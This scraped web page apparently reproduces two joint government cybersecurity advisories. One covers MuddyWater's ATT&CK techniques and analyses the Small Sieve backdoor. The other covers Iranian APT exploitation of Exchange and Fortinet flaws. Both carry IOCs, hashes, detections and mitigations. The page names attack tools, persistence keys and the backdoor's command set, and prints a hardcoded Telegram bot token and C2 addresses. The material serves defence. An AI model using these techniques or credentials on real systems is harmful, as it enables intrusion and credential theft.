Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence. 
Privilege Escalation
Abuse Elevation Control Mechanism: Bypass User Account Control  T1548.002 MuddyWater uses various techniques to bypass user account control.
Credentials from Password Stores T1555 MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Web Browsers

T1555.003

 MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.
Defense Evasion
Obfuscated Files or Information T1027 MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganography T1027.003 MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.
Compile After Delivery T1027.004 MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location T1036.005 MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information

T1140

 MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP

T1218.003

 MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta T1218.005 MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 T1218.011 MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.
Execution Guardrails T1480 The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.
Impair Defenses: Disable or Modify Tools T1562.001 MuddyWater can disable the system’s local proxy settings.
Credential Access
OS Credential Dumping: LSASS Memory T1003.001 MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.
OS Credential Dumping: LSA Secrets

T1003.004

 MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials T1003.005 MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files

T1552.001

 MuddyWater has run a tool that steals passwords saved in victim email.
Discovery 
System Network Configuration Discovery T1016 MuddyWater has used malware to collect the victim’s IP address and domain name.
System Owner/User Discovery T1033 MuddyWater has used malware that can collect the victim’s username.
System Network Connections Discovery T1049 MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discovery T1057 MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery

T1082

 MuddyWater has used malware that can collect the victim’s OS version and machine name.
File and Directory Discovery T1083 MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords “Kasper,” “Panda,” or “ESET.”
Account Discovery: Domain Account T1087.002 MuddyWater has used cmd.exe net user/domain to enumerate domain users.
Software Discovery T1518 MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discovery T1518.001 MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.
Collection
Screen Capture T1113 MuddyWater has used malware that can capture screenshots of the victim’s machine.

Archive Collected Data: Archive via Utility

 T1560.001 MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.
Command and Control
Application Layer Protocol: Web Protocols T1071.001 MuddyWater has used HTTP for C2 communications. e.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxy T1090.002

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. 

MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.
Web Service: Bidirectional Communication T1102.002 MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channels T1104 MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transfer T1105 MuddyWater has used malware that can upload additional files to the victim’s machine.
Data Encoding: Standard Encoding T1132.001 MuddyWater has used tools to encode C2 communications including Base64 encoding.
Data Encoding: Non-Standard Encoding T1132.002 MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software  T1219 MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.
Exfiltration
Exfiltration Over C2 Channel T1041 MuddyWater has used C2 infrastructure to receive exfiltrated data.

 

Mitigations

Protective Controls and Architecture

  • Deploy application control software to limit the applications and executable code that can be run by users. Email attachments and files downloaded via links in emails often contain executable code. 

Identity and Access Management

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  • Limit the use of administrator privileges. Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system—once infected—enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information. 

Phishing Protection

  • Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  • Be suspicious of unsolicited contact via email or social media from any individual you do not know personally. Do not click on hyperlinks or open attachments in these communications.
  • Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  • Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks. 

Vulnerability and Configuration Management

Additional Resources

  • For more information on Iranian government-sponsored malicious cyber activity, see CISA’s webpage – Iran Cyber Threat Overview and Advisories and CNMF’s press release – Iranian intel cyber suite of malware uses open source tools
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.

References

[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools
[2] MITRE ATT&CK: MuddyWater 

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:

5.199.133[.]149
45.142.213[.]17    
45.142.212[.]61
45.153.231[.]104 
46.166.129[.]159 
80.85.158[.]49 
87.236.212[.]22
88.119.170[.]124 
88.119.171[.]213
89.163.252[.]232
95.181.161[.]49
95.181.161[.]50
164.132.237[.]65
185.25.51[.]108
185.45.192[.]228 
185.117.75[.]34
185.118.164[.]21
185.141.27[.]143
185.141.27[.]248 
185.183.96[.]7
185.183.96[.]44
192.210.191[.]188
192.210.226[.]128

Appendix B: Small Sieve

Note: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

Metadata

Table 2: Gram.app.exe Metadata

Filename gram_app.exe 
Description NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key 
Size 16999598 bytes 
MD5 15fa3b32539d7453a9a85958b77d4c95 
SHA-1 11d594f3b3cf8525682f6214acb7b7782056d282 
SHA-256 b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 
Compile Time 2021-09-25 21:57:46 UTC 

 

Table 3: Index.exe Metadata

Filename  index.exe 
Description The final PyInstaller-bundled Python 3.9 backdoor 
Size 17263089 bytes 
MD5 5763530f25ed0ec08fb26a30c04009f1 
SHA-1 2a6ddf89a8366a262b56a251b00aafaed5321992 
SHA-256 bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2  
Compile Time 2021-08-01 04:39:46 UTC 

 

Functionality 

Installation 

Small Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s AppData/Roaming directory and is added as a Run key in the registry to enabled persistence after reboot. 

The installer then executes the backdoor with the “Platypus” argument [T1480], which is also present in the registry persistence key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift

Configuration 

The backdoor attempts to restore previously initialized session data from %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt

If this file does not exist, then it uses the hardcoded values listed in table 4:

Table 4: Credentials and Session Values

Field  Value Description
Chat ID 2090761833  This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. 
Bot ID Random value between 10,000,000 and 90,000,000  This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware.
Telegram Token  2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY  This is the initial token used to authenticate each message to the Telegram Bot API.

 

Tasking 

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the python-telegram-bot module. 

Two task formats are supported: 

  • /start – no argument is passed; this causes the beacon information to be repeated. 
  • /com[BotID] [command] – for issuing commands passed in the argument. 

The following commands are supported by the second of these formats, as described in table 5: 

Table 5: Supported Commands

Command Description
delete  This command causes the backdoor to exit; it does not remove persistence. 
download url””filename  The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.  
change token””newtoken  The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file. 
disconnect  The original connection to Telegram is terminated. It is likely used after a change token command is issued. 

 

Any commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.

Defense Evasion 

Anti-Sandbox 

Figure 1: Execution Guardrail

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line. 

String obfuscation 

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.

Communications 

Beacon Format 

Before listening for tasking using CommandHandler objects from the python-telegram-bot module, a beacon is generated manually using the standard requests library:

Figure 2: Manually Generated Beacon

The hex host data is encoded using the byte shuffling algorithm as described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to: 

admin/WINDOMAIN1 | 10.17.32.18

 
Traffic obfuscation 

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.

 

Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling

 

Detection 

Table 6 outlines indicators of compromise.
 

Table 6: Indicators of Compromise

Type Description Values
Path Telegram Session Persistence File (Obfuscated)  %LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt 
Path Installation path of the Small Sieve binary  %AppData%\OutlookMicrosift\index.exe 
Registry value name Persistence Registry Key pointing to index.exe with a “Platypus” argument HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift 

 

String Recover Script

Figure 4: String Recovery Script

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [email protected]. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [email protected]. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at [email protected]. United Kingdom organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance call 03000 200 973.

Revisions

February 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Source…

Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities

/in


Summary

Actions to Take Today to Protect Against Iranian State-Sponsored Malicious Cyber Activity
• Immediately patch software affected by the following vulnerabilities: CVE-2021-34473, 2018-13379, 2020-12812, and 2019-5591.
Implement multi-factor authentication.
• Use strong, unique passwords.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight ongoing malicious cyber activity by an advanced persistent threat (APT) group that FBI, CISA, ACSC, and NCSC assess is associated with the government of Iran. FBI and CISA have observed this Iranian government-sponsored APT group exploit Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021 to gain initial access to systems in advance of follow-on operations, which include deploying ransomware. ACSC is also aware this APT group has used the same Microsoft Exchange vulnerability in Australia.

The Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations. FBI, CISA, ACSC, and NCSC assess the actors are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.

This advisory provides observed tactics and techniques, as well as indicators of compromise (IOCs) that FBI, CISA, ACSC, and NCSC assess are likely associated with this Iranian government-sponsored APT activity.

The FBI, CISA, ACSC, and NCSC urge critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from Iranian government-sponsored cyber actors.

For more information on Iranian government-sponsored malicious cyber activity, see us-cert.cisa.gov/Iran.

Click here for a PDF version of this report.

Technical Details

Threat Actor Activity

Since at least March 2021, the FBI and CISA have observed Iranian government-sponsored APT actors leverage Microsoft Exchange and Fortinet vulnerabilities to target a broad range of victims across multiple critical infrastructure sectors in furtherance of malicious activities. Observed activity includes the following.

ACSC considers that this APT group has also used the same Microsoft Exchange vulnerability (CVE-2021-34473) in Australia.

MITRE ATT&CK Tactics and Techniques

FBI, CISA, ACSC, and NCSC assess the following tactics and techniques are associated with this activity.

Resource Development [TA0042]

The APT actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum.

  • Mimikatz for credential theft [TA0006]
  • WinPEAS for privilege escalation [TA0004]
  • SharpWMI (Windows Management Instrumentation)
  • WinRAR for archiving collected data [TA0009, T1560.001]
  • FileZilla for transferring files [TA0010]

Initial Access [TA0001]

The Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591) [T1190].

Execution [TA0002]

The Iranian government-sponsored APT actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:

  • SynchronizeTimeZone
  • GoogleChangeManagement
  • MicrosoftOutLookUpdater
  • MicrosoftOutLookUpdateSchedule

Persistence [TA0003]

The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:

  • Support
  • Help
  • elie
  • WADGUtilityAccount

Exfiltration [TA0010]

The FBI and CISA observed outbound File Transfer Protocol (FTP) transfers over port 443.

Impact [TA0040]

The APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. 

  • sar_addr@protonmail[.]com
  • WeAreHere@secmail[.]pro
  • nosterrmann@mail[.]com
  • nosterrmann@protonmail[.]com 

Detection

The FBI, CISA, ACSC, and NCSC recommend that organizations using Microsoft Exchange servers and Fortinet investigate potential suspicious activity in their networks. 

  • Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. Note: refer to Appendix A for IOCs.
  • Investigate exposed Microsoft Exchange servers (both patched and unpatched) for compromise. 
  • Investigate changes to Remote Desktop Protocol (RDP), firewall, and Windows Remote Management (WinRM) configurations that may allow attackers to maintain persistent access. 
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system defined or recognized scheduled tasks for unrecognized “actions” (for example, review the steps each scheduled task is expected to perform).
  • Review antivirus logs for indications they were unexpectedly turned off.
  • Look for WinRAR and FileZilla in unexpected locations. 

Note: for additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom. 

Mitigations

The FBI, CISA, ACSC, and NCSC urge network defenders to apply the following mitigations to reduce the risk of compromise by this threat.

Patch and Update Systems

  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. 
  • Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.

Evaluate and Update Blocklists and Allowlists

  • Regularly evaluate and update blocklists and allowlists.
  • If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Any attempts to install or run this program and its associated files should be prevented.

Implement and Enforce Backup and Restoration Policies and Procedures

  • Regularly back up data, air gap, and password protect backup copies offline.
  • Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides. 
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud). 

Implement Network Segmentation

  • Implement network segmentation to restrict adversary’s lateral movement. 

Secure User Accounts

  • Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties. 
  • Require administrator credentials to install software. 

Implement Multi-Factor Authentication

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems. 

Use Strong Passwords

  • Require all accounts with password logins to have strong, unique passwords.

Secure and Monitor RDP and other Potentially Risky Services

  • If you use RDP, restrict it to limit access to resources over internal networks.
  • Disable unused remote access/RDP ports.
  • Monitor remote access/RDP logs. 

Use Antivirus Programs

  • Install and regularly update antivirus and anti-malware software on all hosts. 

Secure Remote Access

  • Only use secure networks and avoid using public Wi-Fi networks. 
  • Consider installing and using a VPN for remote access.

Reduce Risk of Phishing

  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails

Resources

  • For more information on Iranian government-sponsored malicious cyber activity, see us-cert.cisa.gov/Iran
  • For information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
  • ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).

Appendix A: Indicators of Compromise

IP addresses and executables files are listed below.

IP Addresses

  • 91.214.124[.]143 
  • 162.55.137[.]20 
  • 154.16.192[.]70

Executable Files 

Executable files observed in this activity are identified in table 1.

Table 1: Executable Files 

Filename: MicrosoftOutLookUpdater[.]exe 
MD5: 1444884faed804667d8c2bfa0d63ab13
SHA-1: 95E045446EFB8C9983EBFD85E39B4BE5D92C7A2A
SHA-256: c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624
SHA-512: 6451077B99C5F8ECC5C0CA88FE272156296BEB91218B39AE28A086DBA5E7E39813F044F9AF0FEDBB260941B1CD52FA237C098CBF4B2A822F08E3E98E934D0ECF
Filename: MicrosoftOutlookUpdater.bat
MD5: 1A44368EB5BF68688BA4B4357BDC874F
SHA-1 FA36FEBFD5A5CA0B3A1B19005B952683A7188A13
SHA-256 3A08D0CB0FF4D95ED0896F22F4DA8755525C243C457BA6273E08453E0E3AC4C4
SHA-512 70AA89449EB5DA1D84B70D114EF9D24CB74751CE12D12C783251E51775C89FDCE61B4265B43B1D613114D6A85E9C75927B706F39C576DBB036079C7E8CAF28B2
Filename: MicrosoftOutlookUpdater.xml
MD5: AA40C49E309959FA04B7E5AC111BB770
SHA-1 F1D90E10E6E3654654E0A677763C9767C913F8F0
SHA-256 5C818FE43F05F4773AD20E0862280B0D5C66611BB12459A08442F55F148400A6
SHA-512 E55A86159F2E869DCDB64FDC730DA893718E20D65A04071770BD32CAE75FF8C34704BDF9F72EF055A3B362759EDE3682B3883C4D9BCF87013076638664E8078E
Filename: GoogleChangeManagement.xml
MD5: AF2D86042602CBBDCC7F1E8EFA6423F9
SHA-1 CDCD97F946B78831A9B88B0A5CD785288DC603C1
SHA-256 4C691CCD811B868D1934B4B8E9ED6D5DB85EF35504F85D860E8FD84C547EBF1D
SHA-512 6473DAC67B75194DEEAEF37103BBA17936F6C16FFCD2A7345A5A46756996FAD748A97F36F8FD4BE4E1F264ECE313773CC5596099D68E71344D8135F50E5D8971
Filename: Connector3.exe
MD5: e64064f76e59dea46a0768993697ef2f
Filename: Audio.exe or frpc.exe
MD5: b90f05b5e705e0b0cb47f51b985f84db
SHA-1 5bd0690247dc1e446916800af169270f100d089b
SHA-256: 28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa
Vhash: 017067555d5d15541az28!z
Authentihash: ed463da90504f3adb43ab82044cddab8922ba029511da9ad5a52b8c20bda65ee
Imphash: 93a138801d9601e4c36e6274c8b9d111
SSDEEP: 98304:MeOuFco2Aate8mjOaFEKC8KZ1F4ANWyJXf/X+g4:MeHFV2AatevjOaDC8KZ1xNWy93U
Note:

Identical to “frpc.exe” available at:

https://github[.]com/fatedier/frp/releases/download/v0.34.3/frp_0.34.3_windows_amd64.zip
Filename: Frps.exe
MD5: 26f330dadcdd717ef575aa5bfcdbe76a
SHA-1 c4160aa55d092cf916a98f3b3ee8b940f2755053
SHA-256: d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a
Vhash: 017057555d6d141az25!z
Authentihash: 40ed1568fef4c5f9d03c370b2b9b06a3d0bd32caca1850f509223b3cee2225ea
Imphash: 91802a615b3a5c4bcc05bc5f66a5b219
SSDEEP: 196608:/qTLyGAlLrOt8enYfrhkhBnfY0NIPvoOQiE:GLHiLrSfY5voO
Note:

Identical to “frps.exe” available at: 

https://github[.]com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_windows_amd64.zip

 

 

APPENDIX B: MITRE ATT&CK TACTICS AND TECHNIQUES

Table 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.

Table 2: Observed Tactics and Techniques

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at https://www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [email protected]. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [email protected]. Australian organizations can visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

Revisions

Initial Version: November 17, 2021

This product is provided subject to this Notification and this Privacy & Use policy.

Source…